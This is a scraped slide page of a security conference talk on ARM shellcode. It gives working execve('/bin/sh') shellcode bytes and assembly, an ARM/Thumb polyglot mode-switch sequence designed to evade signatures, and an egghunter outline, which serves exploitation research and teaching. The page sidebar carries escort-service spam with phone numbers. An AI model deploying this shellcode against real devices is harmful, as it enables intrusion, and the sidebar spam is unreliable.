FPGA_BasedGCD
FPGA_BasedGCDFPGA_BasedGCD
FPGA_BasedGCD
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Arm architecture
Arm architectureArm architecture
Arm architecture
 
Basics Of Embedded Systems
Basics Of Embedded SystemsBasics Of Embedded Systems
Basics Of Embedded Systems
 
Haskell Symposium 2010: An LLVM backend for GHC
Haskell Symposium 2010: An LLVM backend for GHCHaskell Symposium 2010: An LLVM backend for GHC
Haskell Symposium 2010: An LLVM backend for GHC
 
07-arm_overview.ppt
07-arm_overview.ppt07-arm_overview.ppt
07-arm_overview.ppt
 
ARM Architecture Instruction Set
ARM Architecture Instruction SetARM Architecture Instruction Set
ARM Architecture Instruction Set
 
Cho
ChoCho
Cho
 

Mehr von Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopSaumil Shah
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopSaumil Shah
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntyCross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntySaumil Shah
 

Mehr von Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntyCross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital Sovereignty
 

Kürzlich hochgeladen

VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebJames Anderson
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Roomdivyansh0kumar0
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsstephieert
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 

Kürzlich hochgeladen (20)

VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girls
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 

ARM Polyglot Shellcode - HITB2019AMS

  • 1. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Make ARM Shellcode Great Again Saumil Shah @therealsaumil #HITB2019AMS 9 May, Amsterdam
  • 2. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS # who am i CEO Net-square. • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
  • 3. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Agenda • A background on ARM shellcode • My research around ARM shellcode – polyglot tricks - ARM Quantum Leap shellcode • Demos • Extra – space limitations - ARM mprotect Egghunter
  • 4. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Example: ARM execve() Shellcode exec command "/bin/sh" 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
  • 5. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 ARM CODE 00: e28f1001 add r1, pc, #1 04: e12fff11 bx r1 THUMB CODE 08: a002 add r0, pc, #8 0a: 4049 eors r1, r1 0c: 4052 eors r2, r2 0e: 71c2 strb r2, [r0, #7] 10: 270b movs r7, #11 12: df01 svc 1 LITERAL POOL 14: 6e69622f .word 0x6e69622f 18: 5a68732f .word 0x5868732f
  • 6. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 • Mostly begins with an ARM-to-Thumb mode switch. • Rest of the shellcode implemented in Thumb mode. • Compact, avoids bad characters, etc.
  • 7. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM Mode • 4 byte (32 bits) width • Can use ALL registers in operands (r0-r10) • Conditional Execution • Efficient code THUMB Mode • 2 byte (16 bits) width • Can use LIMITED registers in operands (r0-r7 only) • No Conditional Execution • Compact code • Released with ARM7TDMI
  • 8. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Some Concerns / Arguments • "I can signature this" - YARA, IDS, … • Thumb-only processor? e.g: STM32 One Shellcode To Run Them All ! ! 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
  • 9. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 1 1 1 0 0 0 1 1 1 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 1 1 condition mov operand1 r1 #7 ARM/THUMB Encoding: mov r1, #7 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 0 0 1 0 0 0 0 1 0 0 0 0 0 1 1 1 mov r1 #7 32 bit ARM instruction 16 bit Thumb instruction
  • 10. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Schrödinger's Instruction Set SAME SAME DIFFERENT BUT ARM THUMB
  • 11. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Opening the Box N Z C V Q J GE E A I F T M Negative Zero Carry oVerflow underflow Jazelle SIMD Endianness Abortdisable IRQdisable FIQdisable Thumb privilege mode
  • 12. NETSQUARE (c) SAUMIL SHAH#HITB2019AMSQUANTUM LEAP SHELLCODE
  • 13. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB mode PASS THROUGH PASS THROUGH PASS THROUGH QUANTUM LEAP Same Same But Different
  • 14. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS "Quantum Leap" - what we need • An deeper understanding of ARM and Thumb instruction encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup" @44CON.
  • 15. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS The ARM to Thumb switch • Avoid "destructive" instructions – Branches, Load/Store, Floating Point, etc. – Illegal instructions. • Also work on ARMv6 (no Thumb2) 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE (T = 0) "THUMB VIEW" (T = 1)
  • 16. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION - add r1, pc, #1 conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by ARM Opcode and conditional flags. • Part influenced by Operand 1 (ARM). • Trickier to control. • Controlled by Destination and Operand 2 of the ARM instruction. • Easier to control. im m ediate
  • 17. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001 0001 0000 0000 0001 asrs r1,r0,#32 e28f 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode 2 influenced by ARM conditional bits operand 1 Thumb Opcode 1 influenced by ARM destination operand Have to tweak conditional bits
  • 18. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Conditional Instructions • How do we change the conditional bits? • Eh… what ARE "conditional bits?" ! • Every ARM instruction can be made CONDITIONAL. • addne triggers ONLY if a "not equals" condition exists (zero flag = 1) add r1, pc, #1 addne r1, pc, #1 ADD ADD IF NOT EQUALS
  • 19. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Conditional Suffixes EQ Equal To Z == 1 NE Not Equal To Z == 0 GT Greater Than (signed) Z == 0 && N == V GE Greater Than or Equal To (signed) N == V LT Less Than (signed) N != V LE Less Than or Equal To (signed) Z == 1 || N != V HI Higher (unsigned) C == 1 && Z == 0 LS Lesser (unsigned) C == 0 || Z == 1 CS Carry Set C == 1 CC Carry Clear C == 0 MI Minus / Negative N == 1 PL Plus / Positive N == 0 VS Overflow Set V == 1 VC Overflow Clear V == 0
  • 20. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS! • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
  • 21. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions operand 1
  • 22. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: PASS THROUGH (THUMB)
  • 23. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Assembling the Quantum Leap • Took many iterations to finalise! • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered in ARM. • Registers r0, r1, r2, r5 altered in Thumb. • No Thumb2 instructions. • No NULL bytes.
  • 24. NETSQUARE (c) SAUMIL SHAH#HITB2019AMSDEMO QUANTUM LEAP SHELLCODE
  • 25. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM Egghunter EXTRAS
  • 26. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS heap stack Lib Lib Binary overflow pointer ROP shellcode shellcode shellcode Shellcode in tight spaces • What if payload exceeds size "constraints"? – Overwrite local variables. – Bottom of the stack. • Many solutions. SEGFAULT! SEGFAULT!
  • 27. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Egghunter • Searches for an EGG (4+4 byte value) in the process memory. • Uses syscalls to determine whether a memory page exists or not (safely). • Upon finding it, Egghunter transfers the control to the code following the EGG. • Nothing new here - done before.
